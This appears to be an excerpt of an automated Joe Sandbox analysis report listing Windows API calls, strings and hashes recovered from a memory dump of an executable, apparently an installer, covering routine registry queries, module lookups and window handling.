                                                              • Instruction Fuzzy Hash: 49F062716041455AEB01FAA5D84266EA3ECDB8430BFA0403BB800BB6C3DA3C9E09493D
                                                              APIs
                                                                • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                              • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483685
                                                              • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004836A8
                                                              Strings
                                                              • System\CurrentControlSet\Control\Windows, xrefs: 00483652
                                                              • CSDVersion, xrefs: 0048367C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                              • API String ID: 3677997916-1910633163
                                                              • Opcode ID: 753ec1cdaceecf10a2c10abed9fa14ba9196f183527e9def43a7b07e5ea74203
                                                              • Instruction ID: 3c550b8be62ae6962ae8a8b2bb2136c6a1766c1456238aff6c9f059f5d92f743
                                                              • Opcode Fuzzy Hash: 753ec1cdaceecf10a2c10abed9fa14ba9196f183527e9def43a7b07e5ea74203
                                                              • Instruction Fuzzy Hash: B1F06D75E00208B6DF20EED88C45BAFB3BCAF14B05F204566E910E7381F6789B448B59
                                                              APIs
                                                                • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00459805,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459715
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen
                                                              • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                              • API String ID: 47109696-2631785700
                                                              • Opcode ID: 2bb6d2a90fde3dca571cbffa0de55d15307f7e9fe95e0bdc468a8876b40318f9
                                                              • Instruction ID: 5fc53f2980ca067f7fdefaa7aa50a153e5e830959166a8c5adde0da5508e813c
                                                              • Opcode Fuzzy Hash: 2bb6d2a90fde3dca571cbffa0de55d15307f7e9fe95e0bdc468a8876b40318f9
                                                              • Instruction Fuzzy Hash: 97F0AF35720150DBCB10EF5AE885B4E6298DB99396F50403BB985CB263C77CCC06CA99
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B46,00000000,00453BE9,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FD9,00000000), ref: 0042D91A
                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D920
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                              • API String ID: 1646373207-4063490227
                                                              • Opcode ID: 9f11ee2d5e3000e0cdd038ccf0fc88bc65f7f941c6d0e4eb05ced4219cc1a029
                                                              • Instruction ID: 1097081faf8e12b72459453f22f39748745641366cc83a46a0cb0e3cd7246884
                                                              • Opcode Fuzzy Hash: 9f11ee2d5e3000e0cdd038ccf0fc88bc65f7f941c6d0e4eb05ced4219cc1a029
                                                              • Instruction Fuzzy Hash: 5FE04FE1B40B1112D71066BA5C82B6B158E4B84724F90443B3994E62C3DDBCD9885A5D
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAE0), ref: 0042EB72
                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB78
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                              • API String ID: 1646373207-260599015
                                                              • Opcode ID: ea69c1903bbb3952bc51afe47cebbdaeff40ebefb6d83304b24a691856bce627
                                                              • Instruction ID: 186c8a8b24504359f9bd95d8817b94a00a7cf61d77d8ea7090d5fad6c77db3b3
                                                              • Opcode Fuzzy Hash: ea69c1903bbb3952bc51afe47cebbdaeff40ebefb6d83304b24a691856bce627
                                                              • Instruction Fuzzy Hash: 1CD0C792312732666D10F1F73CD1DBB098C89116753544477F505E5241D55DDD01196D
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004985C2), ref: 0044F78F
                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F795
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: NotifyWinEvent$user32.dll
                                                              • API String ID: 1646373207-597752486
                                                              • Opcode ID: ae93fc19694d9525260dce27dd3aecea032003b0c05c01207aef2e00a83e3bcb
                                                              • Instruction ID: adaf68bc035e952e092e397114f6a1653fed54d9058db7208dfb757fc5d15743
                                                              • Opcode Fuzzy Hash: ae93fc19694d9525260dce27dd3aecea032003b0c05c01207aef2e00a83e3bcb
                                                              • Instruction Fuzzy Hash: F7E012F4E417049DEF00BBF5BA86B1E3A90E764718B01417FF404A62A2DB7C440C8E5D
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498618,00000001,00000000,0049863C), ref: 00498342
                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498348
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: DisableProcessWindowsGhosting$user32.dll
                                                              • API String ID: 1646373207-834958232
                                                              • Opcode ID: a3044ebe087eacdbfcba4854d25501df4a36c2cbac561551b3a8e0a3d6241fb5
                                                              • Instruction ID: 7eda4cb16e2cba450c320cc229382d7be1fc12bfd2fbc27455de3eb8489cf644
                                                              • Opcode Fuzzy Hash: a3044ebe087eacdbfcba4854d25501df4a36c2cbac561551b3a8e0a3d6241fb5
                                                              • Instruction Fuzzy Hash: 88B092C128174298AC7032FA0C02A1F08084882F28718083F3C48F50C2CD6ED804182D
                                                              APIs
                                                                • Part of subcall function 0044B668: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F785,004985C2), ref: 0044B68F
                                                                • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B6A7
                                                                • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6B9
                                                                • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6CB
                                                                • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6DD
                                                                • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6EF
                                                                • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B701
                                                                • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B713
                                                                • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B725
                                                                • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B737
                                                                • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B749
                                                                • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B75B
                                                                • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B76D
                                                                • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B77F
                                                                • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B791
                                                                • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B7A3
                                                                • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7B5
                                                                • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7C7
                                                              • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004985EA), ref: 0046496F
                                                              • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464975
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad
                                                              • String ID: SHPathPrepareForWriteA$shell32.dll
                                                              • API String ID: 2238633743-2683653824
                                                              • Opcode ID: b0b0cc609965775dafbc177cfbf53c5f286fe0b9a785a06f0526f65a81a5d1e8
                                                              • Instruction ID: ef62b78e1ecbbf86accf82cc5e54c74759ffbda80f6f2c7107c350d82a6c33f4
                                                              • Opcode Fuzzy Hash: b0b0cc609965775dafbc177cfbf53c5f286fe0b9a785a06f0526f65a81a5d1e8
                                                              • Instruction Fuzzy Hash: 48B092E06E2700A88E00B7FA2887B0B104895D0B1DB56063F704979092EB7C4008CD6E
                                                              APIs
                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,0047D4A8,?,?,?,?,00000000,0047D5FD,?,?,?,00000000,?,0047D70E), ref: 0047D484
                                                              • FindClose.KERNEL32(000000FF,0047D4AF,0047D4A8,?,?,?,?,00000000,0047D5FD,?,?,?,00000000,?,0047D70E,00000000), ref: 0047D4A2
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileNext
                                                              • String ID:
                                                              • API String ID: 2066263336-0
                                                              • Opcode ID: b2c7b71d20f6e59f381effc7c5b6ff5d5103613db955826220e612b659a83145
                                                              • Instruction ID: 2979fa4f850f67a6d1e6d53d287e6b8f4dfe67a5ddfa55c2aaa4ecb03bfc0e13
                                                              • Opcode Fuzzy Hash: b2c7b71d20f6e59f381effc7c5b6ff5d5103613db955826220e612b659a83145
                                                              • Instruction Fuzzy Hash: CA812D70D0024DAFDF11DFA5CC55ADFBBB9EF49308F5080AAE808A7291D6399A46CF54
                                                              APIs
                                                                • Part of subcall function 0042EE40: GetTickCount.KERNEL32 ref: 0042EE46
                                                                • Part of subcall function 0042EC98: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECCD
                                                              • GetLastError.KERNEL32(00000000,00475991,?,?,0049C1D0,00000000), ref: 0047587A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CountErrorFileLastMoveTick
                                                              • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                              • API String ID: 2406187244-2685451598
                                                              • Opcode ID: 0a1b29da48a0e8fc9cf90d26d5d6551fdd5eac2558fd5f62cf07407676141883
                                                              • Instruction ID: 8ae0701305b01ce1bca9537847079d861391bf026d2cb8563746cd807755024f
                                                              • Opcode Fuzzy Hash: 0a1b29da48a0e8fc9cf90d26d5d6551fdd5eac2558fd5f62cf07407676141883
                                                              • Instruction Fuzzy Hash: BB4166B0A006098FDB10EFA5D882ADE77B5EF48314F60853BE514BB351D7789A058BA9
                                                              APIs
                                                              • GetDesktopWindow.USER32 ref: 00413D56
                                                              • GetDesktopWindow.USER32 ref: 00413E0E
                                                                • Part of subcall function 00418ED0: 6F59C6F0.COMCTL32(?,00000000,00413FD3,00000000,004140E3,?,?,0049B628), ref: 00418EEC
                                                                • Part of subcall function 00418ED0: ShowCursor.USER32(00000001,?,00000000,00413FD3,00000000,004140E3,?,?,0049B628), ref: 00418F09
                                                              • SetCursor.USER32(00000000,?,?,?,?,00413B03,00000000,00413B16), ref: 00413E4C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CursorDesktopWindow$Show
                                                              • String ID:
                                                              • API String ID: 2074268717-0
                                                              • Opcode ID: d2c454668ecaa59f130cbdc0d7f98644b71464a6bea9d144c6b553ceac200a13
                                                              • Instruction ID: 95de96b99ba854305cf3f6c98da1fc171ffd9c3687d173b50ed20deed18b133b
                                                              • Opcode Fuzzy Hash: d2c454668ecaa59f130cbdc0d7f98644b71464a6bea9d144c6b553ceac200a13
                                                              • Instruction Fuzzy Hash: 59411F75600250AFC710DF2AFA85B5677E1EB64319F15817BE404CB365DB38AD81CF98
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A7D
                                                              • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AEC
                                                              • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B87
                                                              • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BC6
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: LoadString$FileMessageModuleName
                                                              • String ID:
                                                              • API String ID: 704749118-0
                                                              • Opcode ID: 951c1155a055777031086f0b90c3083af3c2960daf331f13f5541ebbba7c3e7d
                                                              • Instruction ID: 11344639af0fa1b95b6fef638a25282c94d515b30ba3ed4b3402aedba36e13da
                                                              • Opcode Fuzzy Hash: 951c1155a055777031086f0b90c3083af3c2960daf331f13f5541ebbba7c3e7d
                                                              • Instruction Fuzzy Hash: 843133706083849ED330EA658945B9F77D89B85304F40483FF6C8D72D1DB79A9048B67
                                                              APIs
                                                              • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E91D
                                                                • Part of subcall function 0044CF60: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF92
                                                              • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E9A1
                                                                • Part of subcall function 0042BBC4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBD8
                                                              • IsRectEmpty.USER32(?), ref: 0044E963
                                                              • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E986
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                              • String ID:
                                                              • API String ID: 855768636-0
                                                              • Opcode ID: 919708f5ffdde2f57f521d6641e4cc0e1a287a75e8cdc9711807c6008472dbb9
                                                              • Instruction ID: 03991ef50c1cdc1947edd1d0bf9da16660927dd763c0b41cb42d654f0fd6bbd7
                                                              • Opcode Fuzzy Hash: 919708f5ffdde2f57f521d6641e4cc0e1a287a75e8cdc9711807c6008472dbb9
                                                              • Instruction Fuzzy Hash: 47113871B5030027E250AA7A9C86B5B76899B88748F14093FB546EB3C7EE7DDC09429D
                                                              APIs
                                                              • OffsetRect.USER32(?,?,00000000), ref: 00495358
                                                              • OffsetRect.USER32(?,00000000,?), ref: 00495373
                                                              • OffsetRect.USER32(?,?,00000000), ref: 0049538D
                                                              • OffsetRect.USER32(?,00000000,?), ref: 004953A8
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: OffsetRect
                                                              • String ID:
                                                              • API String ID: 177026234-0
                                                              • Opcode ID: 39b7304c59ecfeab53ef959acea8ec35100b2c2eb9a0585a5ab9f65ef9bb45fe
                                                              • Instruction ID: af1c1dfc71d00ff4a9a929e8d6bf6bfabc08d13bc1b1844b1e7d273cf48c6b2a
                                                              • Opcode Fuzzy Hash: 39b7304c59ecfeab53ef959acea8ec35100b2c2eb9a0585a5ab9f65ef9bb45fe
                                                              • Instruction Fuzzy Hash: 94217CB6700701ABD700DE69CD85E5BB7DEEBC4344F24CA2AF954C7249D634ED0487A6
                                                              APIs
                                                              • GetCursorPos.USER32 ref: 00417270
                                                              • SetCursor.USER32(00000000), ref: 004172B3
                                                              • GetLastActivePopup.USER32(?), ref: 004172DD
                                                              • GetForegroundWindow.USER32(?), ref: 004172E4
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                              • String ID:
                                                              • API String ID: 1959210111-0
                                                              • Opcode ID: ab2bc15dd938f987afbfcd80c1a154205083a351e68354f3dc1a1c3122339836
                                                              • Instruction ID: a2974bbdd40a4ad71efed6c963999b1e78101043f5dd1c0306289f7dfca9f025
                                                              • Opcode Fuzzy Hash: ab2bc15dd938f987afbfcd80c1a154205083a351e68354f3dc1a1c3122339836
                                                              • Instruction Fuzzy Hash: 4321A1313082018BCB20AB69E985AE733B1EF44754B0545ABF854CB352D73CDC82CB89
                                                              APIs
                                                              • MulDiv.KERNEL32(8B500000,00000008,?), ref: 00494FC1
                                                              • MulDiv.KERNEL32(50142444,00000008,?), ref: 00494FD5
                                                              • MulDiv.KERNEL32(F70577E8,00000008,?), ref: 00494FE9
                                                              • MulDiv.KERNEL32(8BF88BFF,00000008,?), ref: 00495007
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                              • Instruction ID: c81a7ae82503e1df060b9d2e8e6c822c04bb2cec442f3182d8fec1f0f0e8f71f
                                                              • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                              • Instruction Fuzzy Hash: 48112472604204ABCF50DE99C8C4D9B7BECEF4D320B1541A6F918DB246D674DD408BA4
                                                              APIs
                                                              • GetClassInfoA.USER32(00400000,0041F480,?), ref: 0041F4B1
                                                              • UnregisterClassA.USER32(0041F480,00400000), ref: 0041F4DA
                                                              • RegisterClassA.USER32(00499598), ref: 0041F4E4
                                                              • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F51F
                                                              Memory Dump Source
